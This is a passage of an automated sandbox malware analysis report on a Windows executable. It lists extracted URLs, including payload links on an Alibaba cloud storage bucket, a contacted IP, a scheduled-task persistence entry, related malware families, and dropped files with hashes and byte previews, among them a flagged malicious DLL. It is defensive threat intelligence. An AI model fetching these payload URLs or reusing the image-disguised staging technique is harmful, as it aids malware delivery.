http://www.chocolatelakehotel.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	KHoDN.76532.10.exe	false		high
http://www.entrust.net/rpa0	KHoDN.76532.10.exe	false		high
http://aia.entrust.net/evcs1-chain256.cer01	KHoDN.76532.10.exe	false		high
http://www.centuryamadeus.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.ihg.com/canada)	KHoDN.76532.10.exe	false		high
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifW5	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iab.net/guidelines/508676/508767/displayguidelines)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif8	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.samsung.com/business)	KHoDN.76532.10.exe	false		high
http://www.crowneplaza.com/fredericton/corwneplaza)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	vIPphI.exe.0.dr	false		high
http://www.samsung.com/ca)	KHoDN.76532.10.exe	false		high
http://www.entrust.net/rpa03	KHoDN.76532.10.exe	false		high
http://www.gfscanada.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	aceprocted.sys.0.dr	false		high
http://www.mohawkgroup.com/durkan)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.hamptoninntruro.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	KHoDN.76532.10.exe	false		high
http://www.radissonhotelgroup.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://macromedia.com/resources/richmedia/tracking/designers_guide)	KHoDN.76532.10.exe	false		high
http://www.cocacola.ca/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.meublesjlm.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.mountainviewsuites.ca/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.embassysuites3.hilton.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.capebretonresorts.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.renwil.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	vIPphI.exe.0.dr	false		high
https://f3rf3r.oss-cn-beijing.aliyuncs.com/4	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifhttps://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gifhttp	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.irvingenergy.ca/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	vIPphI.exe.0.dr	false		high
http://www.candlewoodsuites.com/montrea)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif#5	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dine-art.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.super8amherst.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	KHoDN.76532.10.exe	false		high
https://www.entrust.net/rpa0	KHoDN.76532.10.exe	false		high
http://www.gktw.org/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
39.103.20.80	sc-2jiu.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1645983
Start date and time:	2025-03-23 03:13:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KHoDN.76532.10.exe
Detection:	MAL
Classification:	mal96.evad.winEXE@2/13@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.31.69.3, 172.202.163.200, 20.24.121.134, 150.171.28.10, 23.33.40.147, 20.109.210.53
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:16:11	Task Scheduler	Run new task: tSnhv path: C:\Users\user\Documents\vIPphI.exe
22:14:24	API Interceptor	941x Sleep call for process: KHoDN.76532.10.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	39.108.250.197
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	39.96.157.212
	NKHod.76452.04.exe	Get hash	malicious	Unknown	Browse	118.178.60.98
	ooDglrtbdQ.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	121.40.100.192
	NHOji.25731.03.exe	Get hash	malicious	Unknown	Browse	39.103.20.35
	resgod.x86.elf	Get hash	malicious	Mirai	Browse	223.7.75.51
	resgod.spc.elf	Get hash	malicious	Mirai	Browse	121.42.103.67
	hoho.m68k.elf	Get hash	malicious	Unknown	Browse	101.200.226.244
	hoho.x86.elf	Get hash	malicious	Unknown	Browse	8.138.112.163
	hoho.armv4l.elf	Get hash	malicious	Unknown	Browse	39.106.110.51

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	24fba8e4dbb590f5038a9ede54af87de.exe	Get hash	malicious	Coinhive, Sapphire, TrojanRansom, WarGame, Xmrig, Zhen	Browse	39.103.20.80
	SDR.exe1.exe	Get hash	malicious	XWorm	Browse	39.103.20.80
	LCrypt0rX.vbs	Get hash	malicious	Chaos, LCRYX, Xmrig	Browse	39.103.20.80
	JPiACp4fEG.exe	Get hash	malicious	Cerber, Conti, Sapphire, TrojanRansom, WarGame	Browse	39.103.20.80
	lqQYyQ4T53.exe	Get hash	malicious	Coinhive, Sapphire, TrojanRansom, WarGame, Xmrig	Browse	39.103.20.80
	cx5v0W2pE2.exe	Get hash	malicious	Sapphire, TrojanRansom, Zhen	Browse	39.103.20.80
	yPPwoSU1RC.exe	Get hash	malicious	Conti, TrojanRansom	Browse	39.103.20.80
	Setup.exe	Get hash	malicious	ACR Stealer	Browse	39.103.20.80
	LCrypt0rX.vbs	Get hash	malicious	Chaos, LCRYX, Xmrig	Browse	39.103.20.80
	NKHod.76452.04.exe	Get hash	malicious	Unknown	Browse	39.103.20.80

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Documents\vIPphI.exe	NKHod.76452.04.exe	Get hash	malicious	Unknown	Browse
	NHOji.25731.03.exe	Get hash	malicious	Unknown	Browse
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse
	BSKDh.98374.10.exe	Get hash	malicious	Unknown	Browse
	Gokod.763652.06.exe	Get hash	malicious	Unknown	Browse
	287263487-92873475.04.exe	Get hash	malicious	Unknown	Browse
	176320045-328764975.06.exe	Get hash	malicious	Unknown	Browse
	1237458-28376475.12.exe	Get hash	malicious	GhostRat	Browse
	1726386475-238475987.12.exe	Get hash	malicious	GhostRat, Nitol	Browse
	1237458-28376475.12.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\d[1].gif

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	3963834
Entropy (8bit):	7.997064399987509
Encrypted:	true
SSDEEP:	49152:POhPyT3tBYfE8C38C4Re7eYDY0vM6so8JSGWOXu/0F5g2ON95swP8gbOOLlBxaH9:FBYbh1odYyws0F5g2308ulXiQKAKPz
MD5:	7389347D4BB06F8A6AC6918F164D86B3
SHA1:	B694D497022098133BCEAD9FB54329570322AD44
SHA-256:	2DD36E91F59CD3335C07DC8380BF70817E6A2C04C1B2ACC32726A74ED92530E0
SHA-512:	3AD8DB1A8F0D62BE0D393F68150C1A8EBFDEA14F0E81FEF6E195669D7B1D6D4AB95403CD9827CA14550235FD8BB2EBA87945BFC7874014FDE220D50D0289EBFB
Malicious:	false
Reputation:	low
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\c[1].gif

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	10515
Entropy (8bit):	7.824657644789603
Encrypted:	false
SSDEEP:	192:PAotzSPrnRwz1kF69bButXBo+EROXPx3DWvuBQDRKe63WUxZjp3527L:P7tWPNw2FQbButSYxWvjRh63Wu35SL
MD5:	0035DC4371138478A84E3BAA8454C764
SHA1:	830A650F59A640386681E7D3ECD4F4D51756C4A2
SHA-256:	692721CF30588CF416B2E5C251D7070DC3C92E664EF47B7F3300187CF982EA8E
SHA-512:	7A63422BFFDDE835933146A85B03C20598A5A980394D7A7C32C7C92C7DBE81719A2057AC5A9419258CAAAA58D83C7E0DC34D989C387A19C9CFDB8D1A246991E7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\i[1].dat

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.34819466217309
Encrypted:	false
SSDEEP:	6:WYplczhuy0EZgQNCrCa2BIDRLJZo4iXuqM7OdUzWFR960qOTGD:DpQ0QWMBIDRE4auqWgUzWF7qHD
MD5:	2994726D480006FFF5081AA811BD3FEC
SHA1:	1F8986BE4D560812D986D439E219E0D5FD76226B
SHA-256:	B1D7567E927A905479E4D2DDBC9D7FEDB8AE4BB3139A57A48BB0F734ED05D004
SHA-512:	BE3F454A34F898E0D01D01B49A33DE32DA016BEA983FB40EFEAF811A1C1CF2EE8DD052EDB115C2D0760F8C09C39A72401E357245F6AA9F15707603102EB46E64
Malicious:	false
Reputation:	low
Preview:	....l%00V.BVe$x9JJ.Z4w8?VUVQ6.0=TDHS0 }0_].Q.68777777777777777777777777777777777_CCG4}hh.[..=\| a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33U.AUf'{:II.Y7t;<UVUR5\|3>WGKP3#~3\^.P~79666666666666666666666666666666666^BBF5\|ii.Z..<}!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111Te^Z?4t>RR>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>N[LX1v<:::::::::::::::::::::::::::::::::::::::::Y[YR7\|63G333333333333333333333333333333333333333

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\a[1].gif

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	140941
Entropy (8bit):	7.995709860892507
Encrypted:	true
SSDEEP:	3072:QdhlD+ea4Anlrl3/af3xh/I7XsYPv0X7ByK4K9TLPMIldjKBDOe:Qdee2lVAFcfPOAzKdPLdIH
MD5:	7AF26B296715B679817DB8F2BC81CF61
SHA1:	4CCD796003847E5D0E08B1467799E65350A5957B
SHA-256:	EC5AAFAE259A514340C65BD581E5C5D14CC7CA56E639223A7FC871AC12257928
SHA-512:	173C60013923CB26A0BE8C2452E2FB9116B11AAAED6B65E1B95ABD4321D86E2B9D67C777FE34B663CDF713D4CA3C235BFF747DBA731A2C58004C469DD5A1DC68
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\s[1].dat

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.7115846618225605
Encrypted:	false
SSDEEP:	384:9SegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ3:R5F1FUdy422IK+gAZt2i0YPpQn4GMc
MD5:	343BE4202B504E07A24093ACF7DD5004
SHA1:	81380B74CCE0AD9B07D31472AD1CE66E4509A6B1
SHA-256:	D266051C3EE42589382E14C87A5822409FC411D1C9B29746DFFA3B21B3D913E5
SHA-512:	3681A0F1103A700AEDCAC247379734EBB73F2B739AC921D2C56FDCD4EA8328E45010F75DE0A13039A44CBD31AE5CBF818BFF26AADB800C53EF233804ECB4DD80
Malicious:	false
Reputation:	low
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\b[1].gif

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	3679381
Entropy (8bit):	7.999920715139405
Encrypted:	true
SSDEEP:	98304:GZEx+gamAtC3BbCzY01owoUHdGk1LYLROXENnn0b7Ke:/ahwCX1omdw8UNn0XKe
MD5:	13E05500C7D6372C50091A56CB1EB698
SHA1:	6A666C3E374F40CEFF6D18D3B798B4E44116E5FB
SHA-256:	3C6D987704BE11CE13F2EA7D56F9C3A6247C4F2718FD6DCD3389803A4B175845
SHA-512:	4F91ED5CAA1E52105CFC60DC3BA017591A63EAA90AEA3E353404FF9A59A553DD5362F81EF90F81274602F030C0201118C8C13DB685AC91C0AF9EE1397BC95AF1
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	102636
Entropy (8bit):	7.997951293018451
Encrypted:	true
SSDEEP:	3072:jTDFMOAPqf3lWtmoyUM4J7ruwxW9/o1w5TWdFJUO/Uai:fDC5AVWMo24dT09/O2uCObi
MD5:	CEE07CC9376774EB4A5F09A96A71AD17
SHA1:	881FD345F334BC2E62DF3BDFF647696A55DECEA8
SHA-256:	33C0E19B8FB335397D618A0372CCA727FC8A1FFCD9B2327510C92CCBD5A1C698
SHA-512:	FE03779374AE0C3A4D32B101184B864F1AF68E0ED0523E8B5DA2D3AAC52737BF9F6E0A40BAE36AA8F7423F651CB3297ABA744D3C912641070B315E971DDDB44F
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\Documents\cache.dat

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3961669
Entropy (8bit):	7.999921044969321
Encrypted:	true
SSDEEP:	98304:ULfESZqX9Gx2pXp60/aZqHIu0nnHmrHHg:ULfLZqX4x2pXM0IAIu4HmrHA
MD5:	2AE55F2EAADCAA25153CD8A7C8DE2921
SHA1:	97F5EE645DCC3F327BF0ABA66C6790511330718A
SHA-256:	B47C0CA2C4EA9D3E98EE55406F5ED564EB994BC750EDF358D6670343418493B3
SHA-512:	666522B1FBB59F00D69972028357F7370A61FC89BC95FD68FF958DD6BCD4769F6B7FB20075336A0F024A297B2ADA2F6AA3453940B9801E657A9437F07D07561C
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+....._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\Documents\eToken.dll

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3677216
Entropy (8bit):	7.965644350089486
Encrypted:	false
SSDEEP:	98304:IPoIOw5/XsBczXPm7iTUlNw2kGiVDFnkyej4MWe:woe/cBcmlNLkGOFzekK
MD5:	00C718B40B97D9554E75A23F719FFCAB
SHA1:	16FA1A374E9EE6355D53E38A92E11A903E4E15A3
SHA-256:	525C64766C192BF06AC8FE527A9093AAB4D9771D89B11ECD0FF85E78199334E8
SHA-512:	36135CD5109FB7B052F18483EFE4E5651EC71CB8C989FF6381F6CF47A70AE52207E65AD3E2C2C72D3382AE39A26ABAEF07D6DD8739E3971EA72A8AC892BB4D11
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....g.........." ...)............J.L.......................................Z...........`.........................................@.N.L.....H.P.....Z.a.....Y..;............Y.4...................................@.Y.@.............!.X............................text...@........................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.QO ....H........................... ..`.h1c....h.....!.....................@....{,3......7...!...7.................`..h.reloc..4.....Y.......8.............@..@.rsrc...a.....Z.......8.............@..@........................................................................................................................................................................................................................................................

C:\Users\user\Documents\perfi.db

Download File

Process:	C:\Users\user\Desktop\KHoDN.76532.10.exe
File Type:	SQLite 3.x database, user version 1, last written using SQLite version 3043002, writer version 2, read version 2, file counter 33, database pages 224, 1st free page 36, free pages 219, cookie 0x4, schema 4, UTF-16 little endian, version-valid-for 33
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	7.9657269070770935
Encrypted:	false
SSDEEP:	192:ikB+jaaYI8zd2LSUtOd+s/e+8opeEWonaK3EIOJjBF+J:/B++9aQdgoIIa5IOR8
MD5:	49BD492EC49FAB4074B506D94455DA31
SHA1:	BAED237038EA5C2DEC9AE42F7973B808858C0E45
SHA-256:	F88F93A7030AD9209D19D18CE93C85601E47F9C6C9334A16A62BB31A36C6B238
SHA-512:	D2D9FBB6F475380F7610F8D0F6787C955EE8B513F6C99AF807AFC90DF76966D4E04147E81550E08E3B4F90568D926C10ABB75937D2FBF1994EFD84068EAF8754
Malicious:	false
